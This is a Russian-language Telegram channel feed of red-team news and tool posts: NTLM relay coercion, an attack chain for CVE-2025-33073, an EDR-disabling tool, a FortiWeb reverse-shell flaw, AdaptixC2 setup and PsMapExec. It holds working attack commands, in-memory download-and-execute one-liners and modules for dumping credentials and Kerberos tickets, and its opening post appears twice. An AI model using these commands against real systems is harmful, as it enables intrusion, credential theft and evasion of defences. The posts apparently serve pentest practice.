Forwarded from RedTeam brazzers (Миша)
Всем привет!
А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )
Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (
2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так:
Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )
Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )
Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (
ncacn_np), а поверх TCP, поэтому появился POC, подключающийся к службе поверх ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так:
echo start > \\.\pipe\winreg. Все эти методы включения объединены под одним большим механизмом Service Triggers, подробный разбор которого вышел у наших коллег из TrustedSec.Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )
Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
# Атакуем комп с именем DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs
Скрипт для сбора полезной информации и проверки возможности повышения привилегий
Запуск:
iwr https://github.com/itm4n/PrivescCheck/releases/latest/download/PrivescCheck.ps1 -OutFile PrivescCheck.ps1
#Базовые проверки
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
#Расширенные
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Audit -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML,CSV,XML"
#privesccheck #windows #powershell #lpe
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤2
Zerosalarium
Using EDR-Redir To Break EDR Via Bind Link and Cloud Filter
EDR-Redir uses BindLink Filter and Windows Cloud Filter to inject, corrupt, and disable EDRs.
Инструмент для редиректа директории EDR в другое место
Протестировано:
EDR-Redir uses a Bind Filter (mini filter bindflt.sys) and the Windows Cloud Filter API (cldflt.sys) to redirect the Endpoint Detection and Response (EDR) 's working folder to a folder of the attacker's choice. Alternatively, it can make the folder appear corrupt to prevent the EDR's process services from functioning
#windows #edr #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
TrustedSec
There's More than One Way to Trigger a Windows Service
Service triggers can be a pentester’s secret weapon, letting low-priv users quietly fire up powerful services like Remote Registry and EFS. Learn how they…
A service trigger is a configuration option for a Windows service that allows that service to be started when some other activity or condition is met. Some of these conditions are largely static, for example the computer being domain joined or having an IP address allocated. Other conditions are more dynamic in nature, for instance receiving a connection request for a given named pipe or processing a specific trace message
#windows #service
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from ZeroNights
Мы начинаем публиковать доклады, которые вы сможете послушать на ZeroNights 2025! Ловите первые три выступления для секции Offensive Track. Она охватывает темы использования современных техник взлома для проведения продвинутых кибератак, обнаружения уязвимостей в устройствах и приложениях, а также способы их эксплуатации.
"Скользкий мамонт - препарируем нашумевший вирус под Android" — Павел Васильев
Разберём увлекательные техники, которые были использованы авторами Android-вируса "Мамонт" для скрытия от статического анализа. Как авторам удалось достичь эффекта, когда установленное приложение может не увидеть система, и не может открыть ни декомпилятор, ни утилиты для работы с архивами? Восстановим код приложения до валидного состояния, декомпилируем и изучим, что же находится под капотом.
"Вредоносные расширения: как ваш браузер работает на атакующего" — Артемий Цецерский
Браузер — наш цифровой рабочий стол. Всё проходит через него: логины, пароли, переписки, финансы. А теперь представь, что внутри него завелся маленький «монстр», который всё это похищает. Страшно?
В этом докладе разберём, как расширения браузера становятся инструментом постэксплуатации и используется для сбора данных, перехвата сессий, проксирования трафика и даже захвата компьютера. Реальные тактики, техники доставки, постэксплуатаци и, конечно же, как с этим всем бороться.
"Истории Kubernetes пентестов: путь через уязвимости" — Сергей Канибор
В докладе поделюсь своим пятилетним опытом проведения пентестов Kubernetes кластеров, а также разберу самые интересные случаи компрометации К8s с помощью уязвимостей. Покажу, как небольшие лазейки превращаются в критические угрозы, и обсудим, какие меры помогут защитить кластер от реальных атак.
Мы будем добавлять доклады по мере их утверждения. Полный вариант программы вы всегда найдете по ссылке на нашем сайте конференции ZeroNights 2025
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4
Forwarded from 1N73LL1G3NC3
UnderlayCopy
PowerShell toolkit that extracts locked Windows files (SAM, SYSTEM, NTDS, ...) using MFT parsing and raw disk reads.
PowerShell toolkit that extracts locked Windows files (SAM, SYSTEM, NTDS, ...) using MFT parsing and raw disk reads.
👍2🔥1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Как круто развивается BloodHound... Теперь и сетевые ресурсы можно отображать
Blog: https://specterops.io/blog/2025/10/30/sharehound-an-opengraph-collector-for-network-shares/
Soft: https://github.com/p0dalirius/sharehound
#pentest #ad #bloodhound
Blog: https://specterops.io/blog/2025/10/30/sharehound-an-opengraph-collector-for-network-shares/
Soft: https://github.com/p0dalirius/sharehound
#pentest #ad #bloodhound
🔥7
runZero
Uncovering network attack paths with runZeroHound
runZeroHound converts runZero asset inventories into BloodHound OpenGraph imports, enabling Cypher-based analysis of real network attack paths.
Коллектор для BHCE на основе OpenGraph для анализа сетевых путей и не только
In a lot of ways, runZero’s Attack Graphs follow the BloodHound methodology; we use data about multi-homed systems, layer-2 topologies, layer-3 routing rules, and known vulnerabilities to demonstrate the “real” paths between systems in complex enterprise networks. With OpenGraph, we finally had an excuse to experiment with runZero data inside of the BloodHound graph
#bhce #golang #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Silent Push
Silent Push Unearths AdaptixC2's Ties to Russian Criminal Underworld, Tracks Threat Actors Harnessing Open-Source Tool for Malicious…
Silent Push has uncovered threat actors tied to the Russian underworld using the AdaptixC2 framework to deliver malicious payloads.
Silent Push раскрывает связи AdaptixC2 с российским преступным миром и отслеживает злоумышленников, использующих данный инструмент
Ребята целое расследование провели и нашли канал Ральфа 😂👍
#adaptix #c2 #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
😁16🔥1
Python реализация известного PowerView.ps1 скрипта
Отличный инструмент при пост эксплуатации
Огромное количество возможностей и настроек, умеет в relay
Работает быстро и стабильно
Различные варианты аутентификации: pfx, kerberos, pth
Из последних фишек, поддержка веб интерфейса
Рекомендую!
Установка в uv:
uv tool install --python 3.12 git+https://github.com/aniqfakhrul/powerview.py --force
Использование:
powerview range.net/lowpriv:[email protected] --dc-ip 192.168.86.192
#with web
powerview range.net/lowpriv:[email protected] --dc-ip 192.168.86.192 --web
Некоторые примеры:
Add-ADComputer
Add-ADUser
ConvertFrom-SID
Get-Domain
Get-DomainCA
Get-DomainRBCD
Get-DomainTrust
Get-NetLoggedOn
Invoke-Kerberoast
Invoke-PrinterBug
Set-CATemplate
Set-DomainRBCD
#powerview #redteam #activedirectory #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from BugXplorer (j b)
Bug Bounty Reading List: A curated collection of articles and resources for bug bounty hunters.
https://bb.vitorfalcao.com/
https://bb.vitorfalcao.com/
🔥1
На арабском, но зато с картинками 😅👍
#android #pentest #mobile #frida
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3😁1
Вышел релиз лучшего open-source C2
Обзоры
UPD 0.10:
Изменения
Server/Client Architecture for Multiplayer Support
Cross-platform GUI client
Fully encrypted communications
Listener and Agents as Plugin (Extender)
Client extensibility for adding new tools
Task and Jobs storage
Files and Process browsers
Socks4 / Socks5 / Socks5 Auth support
Local and Reverse port forwarding support
BOF support
Linking Agents and Sessions Graph
Agents Health Checker
Agents KillDate and WorkingTime control
Windows/Linux/MacOs agents support
Remote Terminal
sudo apt install mingw-w64 make
wget https://go.dev/dl/go1.24.4.linux-amd64.tar.gz -O /tmp/go1.24.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go /usr/local/bin/go
sudo tar -C /usr/local -xzf /tmp/go1.24.4.linux-amd64.tar.gz
sudo ln -s /usr/local/go/bin/go /usr/local/bin/go
sudo apt install gcc g++ build-essential cmake libssl-dev qt6-base-dev qt6-websockets-dev qt6-declarative-dev
git clone https://github.com/Adaptix-Framework/AdaptixC2.git
cd AdaptixC2
make server
make extenders
make client
cd dist
chmod +x ssl_gen.sh
./ssl_gen.sh
./adaptixserver -profile profile.json
./AdaptixClient
#adaptixc2 #redteam #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤4👍3
Forwarded from 1N73LL1G3NC3
CVE-2025-58034: Fortinet FortiWeb OS Command Injection
As a logged in administrator, we can successfully trigger the authenticated command injection vulnerability and execute a netcat reverse shell with root priviledges.
Affected versions:
FortiWeb 8.0.0 through 8.0.1,
FortiWeb 7.6.0 through 7.6.5,
FortiWeb 7.4.0 through 7.4.10,
FortiWeb 7.2.0 through 7.2.11,
FortiWeb 7.0.0 through 7.0.11
As a logged in administrator, we can successfully trigger the authenticated command injection vulnerability and execute a netcat reverse shell with root priviledges.
Affected versions:
FortiWeb 8.0.0 through 8.0.1,
FortiWeb 7.6.0 through 7.6.5,
FortiWeb 7.4.0 through 7.4.10,
FortiWeb 7.2.0 through 7.2.11,
FortiWeb 7.0.0 through 7.0.11
P.S. The auth bypass vulnerability (CVE-2025-64446) can be used to create a new local administrator account, making chaining CVE-2025-64446 + CVE-2025-58034 equivalent to unauthenticated RCE.
👍5😁3❤2
Узкоспециализированный инструмент написанный на
Установка:
sudo python3 -m pip install apachetomcatscanner
Запуск:ApacheTomcatScanner -tt 172.16.0.10 -tp - —-list-cves
▪️ Проверка доступности
▪️ Многопоточность
▪️ Проверка стандартных УД
▪️ Определение версии
▪️ Список уязвимостей и CVE
▪️ Поддержка прокси
▪️ Экспорт в xlsx, json, sqlite
#tomcat #apache #apachetomcatscanner #soft #python
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5👍1
GitHub
GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
Tool for Active Directory Certificate Services enumeration and abuse - ly4k/Certipy
Certipy is a powerful offensive and defensive toolkit for enumerating and abusing Active Directory Certificate Services (AD CS). It helps red teamers, penetration testers, and defenders assess AD CS misconfigurations - including full support for identifying and exploiting all known ESC1-ESC16 attack paths
Подъехало обновление известного инструмента
Из интересного - полная поддержка impacket 0.13.0 и флаг
-debug для любой команды#windows #ad #redteam #certipy #soft #adcs
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
Продвинутый REST API фаззер с высокой скоростью работы. Строит HTML отчеты по окончании. Очень подробная документация на официальном сайте. Написан на
Запуск в режиме black box:
cats --contract=openapi.yml -H "Authorization=$token" --server=https://api-url.com -b -k
Запуск в режиме context mode:
cats --contract=openapi.yaml --server=https://localhost:8080 --headers=headers.yml --refData=referenceData.yml
Запуск в режиме continuous fuzzing:
cats random --contract=openapi.yaml --server=https://localhost:8080 -H "API-KEY=$token" --mc 500 --path "/users/auth" -X POST --stopAfterTimeInSec 10
📚 Тестируем Github API с CATS
#soft #cats #java #fuzzer #web
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Вышло большое обновление отличного инструмента пост эксплуатации в
UPD. 0.9.2
Дополнительные модули в LDAP:
GMSA
ConstrainedDelegation
UnconstrainedDelegation
AdminCount
ComputerSIDs
UserDescriptions
UserLogonRestrictions
UserPasswords
UserSIDs
Текущая поддержка методов (протоколов):
🔵 RDP🔵 SessionHunter🔵 SMB🔵 SMB Signing🔵 LDAP / LDAPS🔵 SSH🔵 Spraying🔵 VNC🔵 WinRM🔵 WMI🔵 MSSQL🔵 Kerberoast
Реализованные модули:
🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов🔵 ConsoleHistory - история в PowerShell🔵 Files - файлы в типичных директориях🔵 KerbDump - дамп Kerberos билетов🔵 eKeys - дамп ключей (Mimikatz)🔵 LogonPasswords - дамп logon passwords (Mimikatz)🔵 LSA - дамп LSA (Mimikatz)🔵 NTDS - реализация DCsync🔵 SAM - дамп SAM
Запуск из памяти:
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")Примеры:
# Текущий пользователь
PsMapExec -Targets All -Method [Method]
# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]
# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput
# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]
#soft #pentest #powershell #psmapexec #redteam #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8